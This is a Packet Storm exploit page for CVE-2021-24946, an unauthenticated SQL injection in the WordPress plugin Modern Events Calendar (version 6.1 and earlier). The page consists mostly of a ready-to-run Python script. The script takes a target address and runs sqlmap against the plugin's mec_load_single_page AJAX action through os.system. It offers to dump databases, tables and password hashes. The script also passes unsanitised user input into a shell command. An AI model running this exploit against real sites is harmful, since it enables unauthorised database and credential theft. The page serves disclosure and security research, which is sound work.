WordPress Modern Events Calendar 6.1 SQL Injection ≈ Packet Storm

Home^[1] Files^[2] News^[3] Contact^[4] Add New^[5]

Change Mirror^[12] Download^[13]

        # Exploit Title: WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)
# Date 26.01.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://webnus.net/modern-events-calendar/
# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.6.1.0.zip
# Version: <= 6.1
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-24946
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24946/README.md
'''
Description:
The Modern Events Calendar Lite WordPress plugin before 6.1.5 does not sanitise and escape the time parameter
before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users,
leading to an unauthenticated SQL injection issue
'''
#Banner:
banner = '''
.oOOOo.  o      'O o.OOoOoo                                                                                   
.O     o  O       o  O                 .oOOo. .oOOo. .oOOo.  oO             .oOOo. o   O  .oOOo. o   O  .oOOo. 
o         o       O  o                      O O    o      O   O                  O O   o  O    o O   o  O      
o         o       o  ooOO                   o o    O      o   o                  o o   o  o    O o   o  o      
o         O      O'  O       ooooooooo     O' o    o     O'   O   ooooooooo     O' OooOOo `OooOo OooOOo OoOOo. 
O         `o    o    o                    O   O    O    O     o                O       O       O     O  O    O 
`o     .o  `o  O     O                  .O    o    O  .O      O              .O        o       o     o  O    o 
`OoooO'    `o'     ooOooOoO           oOoOoO `OooO' oOoOoO OooOO           oOoOoO     O  `OooO'     O  `OooO' 
[+] Modern Events Calendar Lite SQL-Injection
[@] Developed by Ron Jost (Hacker5preme)
'''
print(banner)
import requests
import argparse
from datetime import datetime
import os
# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calendar SQL-Injection (unauthenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
# Exploit:
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
print('[*] Payload for SQL-Injection:')
exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=mec_load_single_page&time=2" '
exploitcode_risk = ' -p time'
print('    Sqlmap options:')
print('     -a, --all           Retrieve everything')
print('     -b, --banner        Retrieve DBMS banner')
print('     --current-user      Retrieve DBMS current user')
print('     --current-db        Retrieve DBMS current database')
print('     --passwords         Enumerate DBMS users password hashes')
print('     --tables            Enumerate DBMS database tables')
print('     --columns           Enumerate DBMS database table column')
print('     --schema            Enumerate DBMS schema')
print('     --dump              Dump DBMS database table entries')
print('     --dump-all          Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url +  retrieve_mode + exploitcode_risk
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))

• Follow us on Twitter^[16]
• Follow us on Facebook^[17]
• Subscribe to an RSS Feed^[18]

File Tags

• ActiveX^[19] (932)
• Advisory^[20] (76,631)
• Arbitrary^[21] (14,941)
• BBS^[22] (2,859)
• Bypass^[23] (1,518)
• CGI^[24] (1,009)
• Code Execution^[25] (6,468)
• Conference^[26] (666)
• Cracker^[27] (797)
• CSRF^[28] (3,247)
• DoS^[29] (21,551)
• Encryption^[30] (2,319)
• Exploit^[31] (49,154)
• File Inclusion^[32] (4,121)
• File Upload^[33] (933)
• Firewall^[34] (821)
• Info Disclosure^[35] (2,531)
• Intrusion Detection^[36] (844)
• Java^[37] (2,736)
• JavaScript^[38] (788)
• Kernel^[39] (5,904)
• Local^[40] (13,904)
• Magazine^[41] (586)
• Overflow^[42] (12,031)
• Perl^[43] (1,409)
• PHP^[44] (5,024)
• Proof of Concept^[45] (2,273)
• Protocol^[46] (3,232)
• Python^[47] (1,365)
• Remote^[48] (29,337)
• Root^[49] (3,428)
• Ruby^[50] (564)
• Scanner^[51] (1,628)
• Security Tool^[52] (7,633)
• Shell^[53] (3,014)
• Shellcode^[54] (1,192)
• Sniffer^[55] (877)
• Spoof^[56] (2,064)
• SQL Injection^[57] (15,868)
• TCP^[58] (2,345)
• Trojan^[59] (666)
• UDP^[60] (865)
• Virus^[61] (657)
• Vulnerability^[62] (30,146)
• Web^[63] (8,867)
• Whitepaper^[64] (3,700)
• x86^[65] (939)
• XSS^[66] (17,210)
• Other^[67]

File Archives

• January 2022^[68]
• December 2021^[69]
• November 2021^[70]
• October 2021^[71]
• September 2021^[72]
• August 2021^[73]
• July 2021^[74]
• June 2021^[75]
• May 2021^[76]
• April 2021^[77]
• March 2021^[78]
• February 2021^[79]
• Older^[80]

Systems

• AIX^[81] (423)
• Apple^[82] (1,853)
• BSD^[83] (368)
• CentOS^[84] (55)
• Cisco^[85] (1,909)
• Debian^[86] (5,947)
• Fedora^[87] (1,690)
• FreeBSD^[88] (1,241)
• Gentoo^[89] (4,149)
• HPUX^[90] (875)
• iOS^[91] (310)
• iPhone^[92] (108)
• IRIX^[93] (220)
• Juniper^[94] (67)
• Linux^[95] (41,360)
• Mac OS X^[96] (682)
• Mandriva^[97] (3,105)
• NetBSD^[98] (255)
• OpenBSD^[99] (476)
• RedHat^[100] (10,971)
• Slackware^[101] (941)
• Solaris^[102] (1,601)
• SUSE^[103] (1,444)
• Ubuntu^[104] (7,589)
• UNIX^[105] (9,014)
• UnixWare^[106] (182)
• Windows^[107] (6,262)
• Other^[108]

© 2020 Packet Storm. All rights reserved.